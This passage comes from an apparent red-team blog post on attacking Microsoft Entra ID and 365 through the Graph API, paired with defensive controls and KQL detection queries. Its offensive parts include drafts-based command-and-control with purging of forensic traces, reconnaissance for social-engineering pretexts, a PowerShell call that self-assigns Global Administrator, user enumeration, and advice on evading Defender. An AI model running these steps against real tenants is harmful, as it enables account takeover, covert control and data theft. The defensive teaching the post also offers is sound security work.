Nothing ever hits the Sent folder. No email rules trigger. The three endpoints that matter: POST /me/messages (messages created this way are drafts by default), GET /me/mailFolders/drafts/messages (poll for commands), and DELETE /me/messages/{id} (clean up). The Havoc C2 framework has been modified to use SharePoint document libraries and Graph API as a C2 channel on the same principle: the traffic blends in with legitimate SharePoint file sync activity. If your org uses Microsoft 365 (and you do), Graph API traffic is constant background noise, and hiding C2 in that noise is genuinely hard to detect without behavioral analysis of the actual Graph operations being performed. This is where traditional network-based detection falls apart: you can't block graph.microsoft.com, and the traffic patterns look normal until you inspect the specific API calls being made.
The detection gap is worse than "hard to see on the network." Even with Microsoft's own logging, there are specific blind spots. The Unified Audit Log (UAL) records MailItemsAccessed events, but only for E5/G5 licenses with advanced auditing enabled. Most orgs don't have this, and even when they do, the events have a 24-48 hour ingestion delay that makes real-time detection impossible. Graph activity logs (now generally available) do capture the specific API endpoints called, but they log at the resource level, not the content level: you can see that someone called POST /me/messages, but not what the draft contained.

The create-read-delete cycle that makes this C2 pattern work also defeats forensic recovery. Deleted drafts go to the Recoverable Items folder with 14-day retention by default, but the implant can follow DELETE /me/messages/{id} with DELETE /me/mailFolders/recoverableitemsdeletions/messages/{id} to permanently purge them. Most implementations skip that second DELETE; performing it is an OPSEC improvement over FINALDRAFT. For OneDrive, the situation is similar: file version history captures uploads, but if the file is created and deleted within the same sync cycle, SharePoint's change log may not capture it at all.

The practical detection approach isn't log-based, it's behavioral. Look for service principals or user accounts that exhibit rapid cyclical patterns on the drafts folder (many creates and deletes within minutes, with no corresponding sent mail) or OneDrive paths that show high file churn with zero sharing activity. Microsoft Sentinel has hunting queries for this, but they require the Graph activity logs connector, which is a separate setup step most deployments skip.
OPSEC: Quiet. All traffic is HTTPS to graph.microsoft.com, indistinguishable from normal M365 usage. Network monitoring sees the same destination as every Outlook and Teams client in the building.
Detection: Microsoft Graph activity logs show the specific API operations (draft creation, deletion patterns). Look for cyclical create-read-delete patterns on mailbox drafts or OneDrive files. Unified audit log MailItemsAccessed and FileAccessed events if advanced auditing is enabled.
Directory data for social engineering
Requires: any valid user credentials (no special permissions needed).
Even without any special permissions, the directory data available through Graph is useful for follow-on attacks. Org charts tell you who reports to whom. Calendar data shows who's out of office (good timing for impersonation). Contact lists give you the external relationships the org has.
# Get a user's manager
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/manager"
# Get direct reports
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/directReports"
# Check who's out of office
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/mailboxSettings/automaticRepliesSetting"
"Hi, this is [CFO's name]'s assistant. She's traveling and needs you to urgently..." You get the idea. The more you know about the org structure, the more convincing the pretext.
Detection: No practical detection for standard directory reads. If you have UEBA tuned, bulk queries for manager chains, directReports, and calendar data from a single user session may flag as anomalous reconnaissance.
That's the full chain: initial access to enumeration to privilege escalation to persistence to post-exploitation. Each phase builds on the last. See the tooling reference at the end for what I use at each step.
What this looks like in practice
I ran 16 of the 19 tools from this post against my own test tenant. 14 produced usable results against current APIs. The account I tested with was a Global Administrator, so some results (full directory role enumeration, complete application credential listing) required that elevation. But the user list, group list, basic app enumeration, and external username validation all work without GA. The point here is which tools still function against real endpoints in 2026 and which ones are dead.
Case study: CVE-2025-55241 and actor tokens
This one is worth calling out because it illustrates a broader principle. CVE-2025-55241 (disclosed and patched July 2025) involved "actor tokens," an undocumented, unsigned JWT mechanism used for internal service-to-service impersonation within Microsoft's infrastructure. These tokens were never meant to be user-facing, but they were accessible. The NetIds used to identify services were sequential integers, not random UUIDs, which made brute-force enumeration feasible. An attacker could generate actor tokens for arbitrary services and impersonate them with zero authentication.
The worst part: zero logging. Actor token usage didn't appear in audit logs, wasn't subject to Conditional Access enforcement, and didn't trigger MFA. If someone had exploited this in the wild, there would have been no forensic trail. Microsoft patched it in three days (July 14-17, 2025) and confirmed no evidence of exploitation before the fix.
The lesson here isn't about this specific CVE. It's that undocumented legacy mechanisms are the real attack surface. Every cloud platform has internal plumbing that predates the current security model. When researchers find those pipes, the results tend to be ugly: no auth, no logging, no awareness that the path even exists. If you're doing security assessments, don't limit yourself to the documented API surface. The interesting stuff is in the parts that weren't supposed to be reachable.
Back in the test tenant, GraphRunner's OAuth2 grant enumeration was the real surprise: it found a delegated permission grant carrying Application.ReadWrite.All and RoleManagement.ReadWrite.Directory.
ClientId: a1b2c3d4-5e6f-7890-abcd-ef1234567890
ConsentType: Principal
Scope: Application.ReadWrite.All RoleManagement.ReadWrite.Directory
DelegatedPermissionGrant.ReadWrite.All Directory.ReadWrite.All
Mail.ReadWrite Mail.Send Files.ReadWrite.All
That is a full tenant compromise path sitting in the OAuth grants table, waiting for anyone who bothers to look.
On the external recon side, AADInternals confirmed that three user accounts exist, without requiring any credentials at all.
Invoke-AADIntUserEnumerationAsOutsider
info@contoso.onmicrosoft.com : False
admin@contoso.onmicrosoft.com : True (EXISTS)
j.smith@contoso.onmicrosoft.com : True (EXISTS)
m.jones@contoso.onmicrosoft.com : True (EXISTS)
AlexW@contoso.onmicrosoft.com : False
MeganB@contoso.onmicrosoft.com : False
user@contoso.onmicrosoft.com : False
test@contoso.onmicrosoft.com : False
Invoke-AADIntUserEnumerationAsOutsider just works. That means an attacker can validate email addresses before ever attempting a password spray. The tools are changing fast, and the gap between "works on the blog post you read" and "works against a real tenant today" is getting wider.
Quick reference: what each permission gets you
| Permission | What you can do |
|---|---|
| RoleManagement.ReadWrite.Directory | Assign yourself Global Admin. One API call. Game over. |
| AppRoleAssignment.ReadWrite.All | Grant any permission to any app. Self-grant RoleManagement, then escalate. |
| Application.ReadWrite.All | Create apps, add secrets/certs, establish persistent backdoors. |
| Mail.ReadWrite | Read/search all mail. Set up forwarding rules. Use drafts as C2 channel. |
| Files.ReadWrite.All | Read/write all OneDrive and SharePoint. Exfiltrate documents. Use as C2 channel. |
| Directory.ReadWrite.All | Modify any directory object. Create users, modify groups, change properties. |
| DeviceManagementConfiguration.ReadWrite.All | Deploy scripts to all Intune-managed devices. Run as SYSTEM. |
| User.ReadWrite.All | Modify any user. Reset passwords, change properties, disable accounts. |
| GroupMember.ReadWrite.All | Add users to any group, including role-assignable groups tied to admin roles. Sounds harmless, isn't. |
| ServicePrincipalEndpoint.ReadWrite.All | Manage SAML and WS-Fed endpoint URLs on service principals. Redirect federated authentication flows to attacker-controlled endpoints. |
| Sites.FullControl.All | Full control over all SharePoint site collections. Read, write, delete anything stored in SharePoint. |
If you find any of these on an app or service principal during enumeration, that's your escalation path. Check it first.
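To make the first row concrete, here's roughly what the RoleManagement.ReadWrite.Directory escalation looks like. This is a sketch, assuming you hold a Graph token with that permission; the principal ID is a placeholder, and 62e90394-69f5-4237-9190-012177145e10 is the well-known built-in Global Administrator role template ID.

```powershell
# Sketch: self-assign Global Admin with a single Graph call.
# Requires a token carrying RoleManagement.ReadWrite.Directory.
$body = @{
    principalId      = "<object-id-of-the-account-you-control>"  # placeholder
    roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10"    # Global Administrator template ID
    directoryScopeId = "/"                                       # tenant-wide scope
} | ConvertTo-Json

Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" `
    -Body $body -ContentType "application/json"
# A 201 response means the principal is now Global Admin.
```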
What defenders should actually do
If you've read this far as a defender wondering how to prevent half of it: you're more empowered than you think. Unlike on-prem AD, where every user can see the entire directory by design, Entra lets you restrict things. And there's a lot more you can do than most orgs realize.
Start here: the foundations
The single most effective control: don't let users register their own applications. Entra Admin Center, User settings, disable "Users can register applications." This one setting removes the ability for every user to create OAuth apps and request Graph API permissions. It's the foundation of half the persistence techniques in this post.
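If you'd rather set it via Graph than click through the portal, the same toggle lives on the tenant's authorization policy. A sketch, assuming a session with Policy.ReadWrite.Authorization:

```powershell
# Sketch: disable user app registration tenant-wide via the authorizationPolicy resource.
$body = @{
    defaultUserRolePermissions = @{ allowedToCreateApps = $false }
} | ConvertTo-Json -Depth 3

Invoke-MgGraphRequest -Method PATCH `
    -Uri "https://graph.microsoft.com/v1.0/policies/authorizationPolicy" `
    -Body $body -ContentType "application/json"
```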
After that: restrict what default users can read via Graph. Set consent policies to require admin approval for non-verified apps. Consider disabling the Entra admin center for non-admin users (it doesn't block Graph queries, but it removes the easy browsing). Monitor service principal role assignments. Alert on new app registrations. Audit Conditional Access policy changes. And actually review your OAuth consent grants regularly.
Get visibility into what Graph API is actually doing
Enable Microsoft Graph activity logs and pipe them into your SIEM. Most of the attacks in this post hit the Graph API at some point. Without these logs, you're flying blind. You won't see token abuse, you won't see permission enumeration, you won't see data exfiltration through Graph endpoints. The logs capture which app called which endpoint with which permissions. That's exactly the signal you need. Route them through a Diagnostic Setting to Log Analytics or Sentinel and build detection rules around unusual Graph calls, especially bulk reads against directory objects or mail endpoints from service principals that shouldn't be doing that.
Critical: If you don't have Microsoft Graph activity logs streaming to your SIEM, you are blind to Graph-based C2, bulk enumeration, and post-exploitation via the API. Every technique in the "Data access and exfiltration" section (mail harvesting, Teams scraping, SharePoint searches, drafts and OneDrive C2 patterns) runs through graph.microsoft.com and looks identical to normal M365 traffic on the network. The only telemetry that distinguishes an attacker reading every mailbox from Outlook doing a sync is the Graph activity log. These logs are not enabled by default. You have to create a diagnostic setting in Entra and route MicrosoftGraphActivityLogs to Log Analytics or your SIEM. Until you do, you have no visibility into which users, apps, or service principals are calling which Graph endpoints, how often, or from where. Enable them.
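One way to create that diagnostic setting programmatically is through the Azure management API's microsoft.aadiam provider, which is where Entra diagnostic settings live. This is a sketch, not a definitive recipe: the workspace resource ID and the setting name are placeholders, and it assumes a connected Az session with rights to write diagnostic settings.

```powershell
# Sketch: route MicrosoftGraphActivityLogs to a Log Analytics workspace.
# Workspace resource ID below is a placeholder - substitute your own.
$workspaceId = "/subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.OperationalInsights/workspaces/<workspace>"
$body = @{
    properties = @{
        workspaceId = $workspaceId
        logs = @(
            @{ category = "MicrosoftGraphActivityLogs"; enabled = $true }
        )
    }
} | ConvertTo-Json -Depth 5

Invoke-AzRestMethod -Method PUT `
    -Path "/providers/microsoft.aadiam/diagnosticSettings/graph-activity-to-siem?api-version=2017-04-01" `
    -Payload $body
```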
Protect your service principals
Enable Workload Identity Protection for service principals. This is the thing most orgs skip because they think Identity Protection is just for users. It's not. Workload Identity Protection gives you risk detections and risk-based Conditional Access policies for service principals: anomalous sign-in properties, suspicious credential additions to high-privilege apps, and tokens issued from suspicious locations. If an attacker tries to backdoor an app registration or abuse a service principal, these signals light up instead of flying under the radar. You need Workload Identities Premium licenses for it, but given how much damage a compromised service principal can do, it's worth it. It directly counters the SP abuse and app registration backdoor techniques we just walked through.
Lock down your break-glass accounts
Implement Restricted Management Administrative Units (RMAUs) for break-glass accounts and privileged service accounts. A regular admin unit is just an organizational container. An RMAU is a hard security boundary. Objects inside an RMAU can only be managed by admins scoped to that specific unit. Even Global Admins can't modify, delete, or remove members unless they're explicitly assigned. This means if an attacker gets Global Admin (which, as you've seen, is very achievable), they still can't touch accounts inside an RMAU. Put your break-glass accounts there. Put your Tier 0 service accounts there. It effectively kills the classic escalation where one compromised Global Admin API call can strip protections from your most sensitive accounts. It's one of the few controls that actually holds up against a compromised Global Admin.
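A minimal sketch of setting one up via Graph. The key detail: isMemberManagementRestricted can only be set at creation time, so you can't retrofit an existing admin unit. The member object ID is a placeholder.

```powershell
# Sketch: create a restricted management administrative unit (RMAU)
# and put a break-glass account inside it.
$au = Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits" `
    -Body (@{
        displayName = "Break-glass accounts"
        isMemberManagementRestricted = $true   # immutable after creation
    } | ConvertTo-Json) -ContentType "application/json"

# Add a member by object ID (placeholder)
Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/$($au.id)/members/`$ref" `
    -Body (@{ "@odata.id" = "https://graph.microsoft.com/v1.0/users/<break-glass-object-id>" } | ConvertTo-Json) `
    -ContentType "application/json"
```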
Conditional Access: the stuff people miss
You probably have Conditional Access policies. But there are a few specific controls that directly counter techniques in this post that most orgs haven't turned on:
Token Protection: Enable it, even if you start in report-only mode. Token Protection, covered in the Browser cookies section above, binds tokens to the device they were issued on and kills token replay from a different machine. Report-only mode lets you see what would break before you enforce it, so there's no excuse not to at least turn that on and start collecting data.
Block device code flow: If your org doesn't use device code authentication (and most don't need it beyond a few edge cases like IoT devices or CLI tools on headless systems), block it in Conditional Access. Device code phishing is one of the most effective initial access techniques right now because it bypasses MFA completely. The user authenticates on their own device with their own MFA, then hands the token to the attacker. If the flow is blocked, the attack doesn't work. Period.
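Here's roughly what that policy looks like created through Graph, using the authenticationFlows condition. A sketch: it starts in report-only mode so you can observe impact before enforcing, and depending on tenant state the condition may still require the beta endpoint.

```powershell
# Sketch: CA policy that blocks device code flow tenant-wide.
# state is report-only here; flip to "enabled" once you've reviewed the impact.
$policy = @{
    displayName = "Block device code flow"
    state       = "enabledForReportingButNotEnforced"
    conditions  = @{
        users        = @{ includeUsers = @("All") }
        applications = @{ includeApplications = @("All") }
        authenticationFlows = @{ transferMethods = "deviceCodeFlow" }
    }
    grantControls = @{ operator = "OR"; builtInControls = @("block") }
} | ConvertTo-Json -Depth 5

Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies" `
    -Body $policy -ContentType "application/json"
```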
Continuous Access Evaluation (CAE) strict enforcement: CAE lets Entra revoke tokens in near-real-time when conditions change, like a user getting disabled or their location changing. But the default "standard" mode is lenient: it only covers a handful of critical events and only for a limited set of Microsoft first-party apps, and you're still sitting on up to an hour of token lifetime for most scenarios. Strict enforcement mode tightens the evaluation window, reduces the grace period, and enables IP-based enforcement, so if someone steals a token and replays it from a different IP, CAE can catch it. A lot of defenders assume "we have CAE" means stolen tokens get killed instantly, but without strict mode that's not the case. Turn on strict mode for your critical apps. It directly counters token replay from different networks.
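Strict mode is a session control on the CA policy itself. A sketch of the PATCH that flips it on for an existing policy (the policy ID is a placeholder; apply it to policies covering your critical apps):

```powershell
# Sketch: switch an existing CA policy's CAE mode to strict enforcement.
$patch = @{
    sessionControls = @{
        continuousAccessEvaluation = @{ mode = "strictEnforcement" }
    }
} | ConvertTo-Json -Depth 4

Invoke-MgGraphRequest -Method PATCH `
    -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies/<policy-id>" `
    -Body $patch -ContentType "application/json"
```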
Detect the weird stuff with MDCA
Deploy Microsoft Defender for Cloud Apps (MDCA) and configure it for anomalous app behavior detection. MDCA is the E5 feature that watches what happens after someone gets in, and it works without relying on sign-in logs, which means techniques in this post that dodge Entra ID detection still have to contend with MDCA's behavioral analytics. It can spot things like: a service principal that's never accessed SharePoint suddenly downloading thousands of files, an app that normally makes 10 Graph calls a day suddenly making 10,000, OAuth apps requesting unusual permission combinations, impossible travel, and suspicious inbox rule creation. These are exactly the patterns you'd see during post-exploitation. The built-in anomaly detection policies catch a surprising amount of attack activity if you actually turn them on and tune the alerts so your SOC doesn't ignore them.
The bigger point
In AD, visibility is a feature you can't turn off. In Entra, restriction is an option many orgs don't use. But beyond restriction, there's a whole layer of detection and token-level controls that most environments haven't enabled. The attacks in this post aren't theoretical. They work against default configurations. Every control in this section makes them harder, and stacking them makes most of them impractical.
The detection notes throughout this post are useful if you know what to grep for in the portal. But if you're running Sentinel or Defender XDR, here are actual KQL queries you can deploy as analytics rules. These cover the highest-signal techniques from this post.
1. Device code flow authentication
Device code phishing is one of the most effective initial access techniques because it bypasses MFA and produces a full refresh token. Most tenants have zero legitimate device code flow usage outside a handful of service accounts. This query surfaces all of it.
SigninLogs
| where AuthenticationProtocol == "deviceCode"
| where ResultType == 0 // successful sign-ins only
| project
TimeGenerated,
UserPrincipalName,
AppDisplayName,
IPAddress,
Location = LocationDetails.city,
DeviceDetail,
ConditionalAccessStatus,
RiskLevelDuringSignIn
| order by TimeGenerated desc
2. Application credential additions
Adding a secret or certificate to an existing app registration is the most common persistence mechanism in this post. Attackers add credentials to apps that already hold high-privilege Graph permissions, then authenticate as that service principal. Alert on every instance and validate with the app owner.
AuditLogs
| where OperationName == "Update application - Certificates and secrets management"
| extend InitiatedBy_UPN = tostring(InitiatedBy.user.userPrincipalName)
| extend InitiatedBy_App = tostring(InitiatedBy.app.displayName)
| extend TargetApp = tostring(TargetResources[0].displayName)
| extend TargetAppId = tostring(TargetResources[0].id)
| extend KeyDescription = tostring(TargetResources[0].modifiedProperties)
| project
TimeGenerated,
InitiatedBy_UPN,
InitiatedBy_App,
TargetApp,
TargetAppId,
KeyDescription
| order by TimeGenerated desc
3. Directory role assignments outside PIM
If PIM is configured, all legitimate role assignments should flow through the PIM activation process. Direct "Add member to role" events that bypass PIM are either misconfiguration or an attacker assigning themselves privileges. This query filters out PIM-initiated assignments to show only direct ones.
AuditLogs
| where OperationName == "Add member to role"
| where Category == "RoleManagement"
| where InitiatedBy.app.displayName != "MS-PIM" // exclude PIM-initiated assignments
| extend InitiatedBy_UPN = tostring(InitiatedBy.user.userPrincipalName)
| extend TargetUser = tostring(TargetResources[0].userPrincipalName)
| extend RoleName = tostring(TargetResources[2].displayName)
| project
TimeGenerated,
InitiatedBy_UPN,
TargetUser,
RoleName,
Result
| order by TimeGenerated desc
4. Conditional Access policy modifications
CA policy changes are one of the highest-severity audit events in Entra. An attacker who can weaken or disable a CA policy removes the guardrails for every other technique in this post. Every modification should trigger an alert and require out-of-band confirmation from the security team.
AuditLogs
| where OperationName in (
"Update conditional access policy",
"Delete conditional access policy",
"Add conditional access policy"
)
| extend InitiatedBy_UPN = tostring(InitiatedBy.user.userPrincipalName)
| extend PolicyName = tostring(TargetResources[0].displayName)
| extend ModifiedProperties = TargetResources[0].modifiedProperties
| mv-expand ModifiedProperties
| extend PropertyName = tostring(ModifiedProperties.displayName)
| extend OldValue = tostring(ModifiedProperties.oldValue)
| extend NewValue = tostring(ModifiedProperties.newValue)
| project
TimeGenerated,
OperationName,
InitiatedBy_UPN,
PolicyName,
PropertyName,
OldValue,
NewValue
| order by TimeGenerated desc
5. Graph API C2 via mailbox drafts
The GraphRunner C2 technique uses mailbox drafts as a dead drop: create a draft with a command, read the draft for output, delete the draft to clean up. This produces a distinctive cyclical pattern in MicrosoftGraphActivityLogs. The query below looks for accounts with repeated POST/GET/DELETE operations against the messages endpoint within a sliding window, which is not normal email client behavior.
MicrosoftGraphActivityLogs
| where RequestUri has_any ("/me/messages", "/me/mailFolders/Drafts")
| where RequestMethod in ("POST", "GET", "DELETE")
| summarize
POSTs = countif(RequestMethod == "POST"),
GETs = countif(RequestMethod == "GET"),
DELETEs = countif(RequestMethod == "DELETE"),
FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated)
by UserId, bin(TimeGenerated, 1h)
| where POSTs >= 3 and DELETEs >= 3 // cyclical create-delete pattern
| where POSTs - DELETEs between (-2 .. 2) // roughly equal creates and deletes = cleanup
| project
UserId,
TimeGenerated,
POSTs,
GETs,
DELETEs,
FirstSeen,
LastSeen
| order by POSTs desc
What to take away from this
Everything in this post starts from one authenticated user with zero admin roles. That's the part worth sitting with. The identity plane is the perimeter now, and most Entra tenants hand every authenticated user far more visibility and capability than anyone on the defensive side realizes. The gap between "low-privilege user" and "tenant compromise" is not a chain of exotic zero-days; it's default settings, Graph API calls, and consent flows that nobody audited. If you only remember one thing: the attacker doesn't need your credentials to own your tenant; they need one set of credentials and the defaults you never changed.
Appendix: Cloud tooling quick reference
I use different tools for different phases. Here's what I reach for and when.
| Tool | What it does | When I use it |
|---|---|---|
| ROADtools / ROADrecon | Entra enumeration, dumps directory to local SQLite for offline analysis | First thing after getting a valid account. Dump everything, analyze later. One thing worth knowing: ROADrecon is broken as of 2026. It depends on Azure AD Graph (graph.windows.net), which is now fully blocked. Every request returns 403. roadtx from the same toolkit still works because it uses Microsoft Graph. |
| AADInternals | PowerShell module for Entra exploitation: token manipulation, Golden SAML, AD Connect credential extraction, backdoor creation | Persistence and advanced attacks. The Swiss army knife for Entra-specific stuff. In 2026 testing, unauthenticated recon commands still work but authenticated commands fail on macOS due to MSOnline dependency issues. |
| GraphRunner | Post-exploitation via Graph API: mailbox search, Teams messages, file exfiltration, app manipulation | Once I have tokens and want to do data-focused post-exploitation without writing custom Graph queries. Still functional in 2026 but stale (last commit August 2023), so expect some endpoints to need manual fixes. |
| TokenTactics | Device code phishing, token manipulation, token refresh across different resource scopes | Initial access via device code phish, or converting tokens between services (e.g., Outlook token to Graph token). |
| AzureHound | Entra and Azure data collector for BloodHound, maps attack paths to admin roles | After initial access when I want to map out privilege escalation paths. Run once, query in BloodHound repeatedly. |
| MicroBurst | Azure services enumeration and post-exploitation (storage, key vaults, VMs, automation accounts) | When the engagement includes Azure IaaS/PaaS, not just Entra. Good for finding exposed storage accounts and key vaults. |
| PowerZure | Azure resource exploitation: VM command execution, key vault access, automation runbook abuse | Post-exploitation on Azure resources. Pairs well with a compromised managed identity or service principal with Azure RBAC roles. In 2026, Graph API calls fail due to legacy token handling (InvalidAuthenticationToken), but Azure subscription commands still work. |
| MFASweep | Tests which services/protocols enforce MFA for a given account | After getting valid credentials, before anything else. Find out which doors are open. |
| EntraSpray | Entra ID password spraying with smart lockout awareness and ROPC-based user enumeration | When I need to spray or validate user existence. Differentiates existing vs non-existing accounts via ROPC error codes. |
| o365spray | Python-based O365 user enumeration and password spraying | User enumeration as a separate step before spraying. Good for building a valid user list without triggering lockouts. |
| TokenTacticsV2 | OAuth token manipulation, refresh token abuse, device code phishing, FOCI token exchange | Token-focused attacks: converting tokens between resource scopes, cookie-based token theft, passkey login abuse. |
| EntraFalcon | Entra ID security assessment: misconfigurations, risky settings, policy gaps | Full posture check. Generates a report covering CA gaps, risky permissions, stale accounts, and more. In 2026 testing, device code auth flow failed and the assessment did not complete. |
| NoPrompt | Exploits OAuth consent flow gaps for token acquisition without user interaction | When testing whether apps have pre-consented scopes that can be exploited silently. |
| BloodHound CE | Attack path visualization and graph database for AD and Entra identity relationships | After AzureHound collection. Query for shortest paths to Global Admin, find unexpected privilege chains. |
A note on tooling: some of these get flagged by Defender. AADInternals especially triggers a lot of detections in environments with Defender for Identity or Defender for Cloud Apps. If you're testing in an environment with detection capabilities, expect to get caught quickly unless you're rolling your own Graph queries. Which, honestly, is what I end up doing half the time anyway. A custom PowerShell script calling Invoke-MgGraphRequest doesn't trigger the same detections as a known offensive tool.